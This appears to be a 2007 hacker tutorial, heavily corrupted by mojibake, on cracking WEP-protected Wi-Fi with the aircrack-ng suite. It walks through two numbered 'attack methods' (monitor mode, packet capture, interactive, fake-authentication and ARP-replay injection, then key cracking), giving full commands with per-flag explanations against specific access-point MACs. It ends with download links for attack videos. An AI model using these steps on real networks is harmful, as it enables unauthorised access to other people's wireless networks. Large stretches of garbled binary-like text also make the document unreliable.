          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
���!�aא� �)���א�W� ��z6���U����{(�k��1airmon-ng ���U�� ��8����Aircrack�8&��،،����&�א� �
bt ~ # airmon-ng stop ath0
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
eth0            Centrino b/g    ipw2200
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)
bt ~ # airmon-ng start wifi0
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
eth0            Centrino b/g    ipw2200
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
bt ~ # iwconfig ath0
ath0      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.457 GHz  Access Point: Not-Associated
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-94 dBm  Noise level=-94 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
�WWWWE�rw�1א�M)�*��5���zא�i�j/א���k�WWWW� �
4��4��4��4����rM�M)����(�k�[�R�-א�z�1�'א����r��(�rM����i�j/א�Monitor��_��(M"��� ��rM��R)��r���J���(א��א����@�Xא�Vא�#Zא�)(�����K� �
��*(���J�5Sא�z�1�c��@��*(F5�0�e�r��(���)*1�i�j/א�א=<�i)Y��!� ���interactive ��Kא/("�i�j��z6>=א���� �
4�@"�T��e�s�p�����6�i�j/��8>=א�א�������NFZא�*��u�6א��W� �
4qqa����4�Dqqא��[��*�qq@��qq�����Fqq1M�83�qqp����zqq�1�c��qq@�+�qqאqq5S��KK�+$�.�qqVW�)qqW�(�������0qq�e"��qq*(���Jא�����4qq����"M�Oaqq5�x�qqE��qq*6V(��qq���qq���cqq�eא���،����#qqY-א�.�qqVW��qqZwא�+�qq��Fא�"�،��'�qq��k�4qqE�!�vא�arp
request��)qqq(U!�r�Dqqq1�47qqq���ivs�qqq:�9אqqq5S�qqq(�k��qqq1��qqq*(���J}�א����qqq*(Fא-��)qqq���qqq5M� qqq6®"����O�Dqq� �א�&��r�qq���qqא���)qq�!�r�Dqq1��qq�5���cqq�!א�qq��T�qq���O�Dqq��bit�_�qq 64א�(������qq�A�vא�٠٠٠}�٢٥٠
�0q������5���،�T����O�D���_�bit 128"א�(�������A٠٠٠}���٥٠٠ ��0������5���K�� �� �
������9"Sא�i�j/א���(�k������9"Sא�i�j/א���(�k������9"Sא�i�j/א���(�k������9"Sא�i�j/א���(�k���������������������������������������������������������������������������������������������������������������������������� The attack method 1
airodump-ng - capture packets
aireplay-ng - interactive attack modes [injection packets]
aircrack-ng - crack WEP, WPA
(1) airodump-ng
�U������k��1`�E�K)}�>=|�א��[��V\��"���5����!����א� �
airodump-ng -c 11 --bssid 00:14:7F:1F:27:6D -w capture ath0
* -c : channel number
* --bssid : MAC address of the access point
* -w : write the captured packets to a file
* capture : name of the file the packets are saved to
* ath0 : our interface name
(2) aireplay-ng interactive
k��1qqqqq�U����(�i�j<�i)Y����E�z6א����!�'�"���i��!�`�E)}�>=|�א��*interactive� �
aireplay-ng --interactive -b 00:14:7F:1F:27:6D -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:13:CE:6D:61:59 ath0
* --interactive : attack mode
* -b : MAC address of the access point
* -d : destination MAC (broadcast)
* -m 68 : minimum packet length
* -n 68 : maximum packet length
* -p 0841 : sets the frame control
* -h : MAC address of the client
* ath0 : our interface name
(3) increase the packets
���!)<�q@��qq��4qa���qq���T��qq mא�[�F١�E�����qq���T��q mא�{qq�� ��)qq&�"�_א)qW��qq������qq!�5��q�5��F٢�E�`�qqEא��[���5�����6א.�D��R�(R>(�א���K� �
(4) aircrack-ng
�U��������א���k��1i��!�`�E���O�D)}�>=|�א�
aircrack-ng -b 00:14:7F:1F:27:6D capture.cap
* -b : MAC address of the access point
* capture.cap : the capture file
i)Y��qq!i)Y��qq!i)Y��qq!i)Y��qq!�5�)qqW�(�$���)q*1�i�qqj/א�א=qq<��i�qqj/א�א=qq<�z6�qq("��qq*(���J�qq5Sא�zqq�1�c��qq@��qq*(FFake authentication ������ �
� �
�8�������NFZא�*��u�6א��i�j/�4>=א�א�@"�T��e�s�p�����6�W� �
��4a���������������q*(���J�q5Sא�z�1�c��@��*(F5�|M�)W�(�$�4�Dא��[��*�@����&u:�i")qא����"��q�&(�cq�eא�#א�����*(���J�5Sא�z�1�c��@��*(F5�0�eK� �� �
���<�qq!�vא��i�qqj/א�א=qq<�i)Y��qq!�4qqא�J�qq5Sא��c��qq@��qq*(F5�0qq�e��qq!M��qq*(���FK(U���qq��z6�qq(�E��qq��4E�!arp request �9:�J�5S�4א����(���arp replay ���)<�Dq*����1א��V.�א��>����86!�E"
���5���K]�א.8���Z�4�D��R�(Rא� �� �� �
The attack method 2
airmon-ng - switch to monitor mode
airodump-ng - capture packets
aireplay-ng - attack mode: fake authentication
aireplay-ng - attack mode: arpreplay
aircrack-ng - crack WEP, WPA
(1) airodump-ng
airodump-ng -c 6 --bssid 00:14:6C:1A:98:8C -w output ath0
* -c : channel number
* --bssid : MAC address of the access point
* -w : save the capture to a file
* output : name of the file the packets are saved to
* ath0 : our interface name
(2) aireplay-ng fake authentication
aireplay-ng --fakeauth 6000 -o 1 -q 10 -e DataCenter -a 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0
* --fakeauth : attack mode
* -o 1 : send only one set of packets at a time
* -q 10 : send keep-alive packets every 10 seconds
* -e : name of the access point
* -a : MAC address of the access point
* -h : MAC address of our card
* ath0 : our interface name
(3) aireplay-ng arpreplay
aireplay-ng --arpreplay -b 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0
* --arpreplay : attack mode
* -b : MAC address of the access point
* -h : MAC address of our card
* ath0 : our interface card
(3) increase the packets
(4) aircrack-ng
aircrack-ng -b 00:14:6C:1A:98:8C output.cap
* -b : MAC address of the access point
* output.cap : capture file
Attack-method 1 (124 MB)
http://www.4shared.com/file/24526019/8831b5f1/attack-method1part1.html?dirPwdVerified=630ebe35 50MB
http://www.4shared.com/file/24546586/40c72462/attack-method1part2.html?dirPwdVerified=630ebe35 50MB
http://www.4shared.com/file/24548769/ada0b720/attack-method1part3.html?dirPwdVerified=630ebe35 24MB

Attack-method 2 (113 MB)
http://www.4shared.com/file/24553904/65b4efa0/attack-method2part1.html?dirPwdVerified=24884433 50MB
http://www.4shared.com/file/24590482/9b931121/attack-method2part2.html?dirPwdVerified=24884433 50MB
http://www.4shared.com/file/24592271/2b86e86d/attack-method2part3.html?dirPwdVerified=24884433 13MB
١٢�r������L١٤٢٨q<�� �� �
(September 23, 2007)
- ----- ---- --- ---- --- ---- ---- ---
��א����+�א$��#"!�8א����+�א$��#"!�8א����+�א$��#"!�8א����+�א$��#"!��67���67���67���67�����8 �� �� �� �----------------------------------------------------------------
aLT3rEQ$Hacker ------------------------------------------------------------------